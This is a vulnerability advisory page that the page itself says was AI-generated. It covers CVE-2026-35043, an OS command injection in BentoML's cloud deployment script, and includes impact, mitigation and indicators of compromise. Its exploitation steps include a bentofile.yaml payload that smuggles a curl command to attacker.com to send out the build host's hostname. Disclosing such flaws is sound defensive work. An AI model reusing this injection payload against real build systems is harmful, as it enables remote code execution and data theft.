CVE-2026-35043: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-35043 is an OS command injection vulnerability in BentoML, a Python library for building AI model serving systems. It represents an incomplete fix for CVE-2026-33744: while commit ce53491 (March 24, 2026) added shlex.quote to Dockerfile templates and images.py, the cloud deployment path in src/bentoml/_internal/cloud/deployment.py (line 1648) was overlooked. All BentoML versions up to and including 1.4.37 are affected; the issue is patched in version 1.4.38. It carries a CVSS v3.1 base score of 7.8 (High) (Github Advisory, BentoML Advisory).

Technical details

The root cause is CWE-78 (Improper Neutralization of Special Elements used in an OS Command). In deployment.py, the _build_setup_script() function constructs a shell command by joining system_packages values from bentofile.yaml directly into an f-string — f"apt-get update && apt-get install -y {' '.join(config.docker.system_packages)} || exit 1\n" — without applying shlex.quote. The resulting setup.sh script is uploaded to BentoCloud (line 908) and executed on the cloud build infrastructure during deployment. An attacker can inject shell metacharacters (e.g., semicolons, ${IFS}) into a system_packages entry to break out of the apt-get command and execute arbitrary shell commands. The vulnerability is also triggered via a second call path in Deployment.watch() used for dev-mode hot-reload deployments (Github Advisory, BentoML Advisory).

Impact

Successful exploitation results in remote code execution on BentoCloud's build infrastructure (or enterprise Yatai/Kubernetes build nodes) with the privileges of the deployment process, achieving high confidentiality, integrity, and availability impact. The build environment typically has access to container registries, artifact storage, cloud credentials, and deployment APIs, making it a high-value pivot point for broader infrastructure compromise. Attack scenarios include supply chain poisoning via a shared Bento from a public model hub, insider threat by a data scientist with deploy permissions exfiltrating secrets, and full CI/CD pipeline compromise (BentoML Advisory).

Exploitability

A proof-of-concept exploit with concrete reproduction steps is publicly available in the GitHub Security Advisory, demonstrating command injection via a malicious bentofile.yaml payload (BentoML Advisory). Exploitation requires user interaction (a user must trigger a deployment), but no privileges are required beyond the ability to supply a bentofile.yaml. The EPSS score is approximately 0.069%, indicating a currently low probability of active exploitation. There is no evidence of in-the-wild exploitation or CISA KEV catalog listing at this time. The vulnerability is detected by Qualys (detection ID 5010447) (Github Advisory).

Exploitation steps

  1. Craft a malicious bentofile.yaml: Create a bentofile.yaml with a poisoned system_packages entry containing shell metacharacters, e.g.:
service: "service:svc"
docker:
  system_packages:
    - "curl"
    - "jq;curl${IFS}http://attacker.com/rce?d=$(cat${IFS}/etc/hostname)${IFS}#"
  1. Trigger deployment: Initiate a BentoML cloud deployment (e.g., via bentoml deploy) using the malicious bentofile.yaml. This causes _build_setup_script() in deployment.py:1648 to interpolate the unquoted package names into a shell command.
  2. Observe generated setup.sh: The vulnerable code produces:
apt-get update && apt-get install -y curl jq;curl${IFS}http://attacker.com/rce?d=$(cat${IFS}/etc/hostname)${IFS}# || exit 1
  1. Script uploaded and executed: BentoML uploads setup.sh to BentoCloud (line 908) and the platform executes it on the build infrastructure during container setup.
  2. Command injection fires: The semicolon terminates the apt-get command; the injected curl command runs, exfiltrating the build host's hostname (or executing any other arbitrary command). The trailing # comments out the || exit 1 error handler, suppressing failure detection (BentoML Advisory).

Indicators of compromise

  • File System: Presence of unexpected files created during build (e.g., /tmp/PWNED_BY_INJECTION or similar artifacts); unexpected scripts in the build workspace directory.
  • Network: Outbound HTTP/HTTPS requests from the build infrastructure to unknown external hosts during the apt-get install phase; DNS lookups or connections to attacker-controlled domains originating from the build container.
  • Logs: Build logs showing setup.sh execution with unexpected commands beyond apt-get install; shell commands containing ${IFS}, semicolons, or backtick/$() subshell syntax in the package install line; error messages or unexpected output following the apt-get invocation.
  • Process: Unexpected child processes (e.g., curl, wget, bash, python) spawned from the build script process during the package installation phase of deployment (BentoML Advisory).

Mitigation and workarounds

Upgrade BentoML to version 1.4.38 or later, which applies shlex.quote to each package name in _build_setup_script(), matching the fix already applied in images.py and Jinja2 templates. If immediate patching is not possible, avoid deploying bentofile.yaml files from untrusted sources to BentoCloud, and audit recent cloud deployments for suspicious system_packages values containing shell metacharacters (;, |, &, $, backticks). Review build logs for unexpected commands executed during the setup.sh phase (Github Advisory, BentoML Advisory).

Community reactions

The vulnerability was reported by researcher Koda Reef and published by BentoML maintainer frostming on April 2, 2026. Social media activity includes a mention on Mastodon by @thehackerwire and a post on Bluesky by cyberhub.blog, indicating moderate community awareness. A NixOS/nixpkgs issue was also filed referencing the vulnerability, suggesting downstream package maintainers are tracking the fix (Github Advisory).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management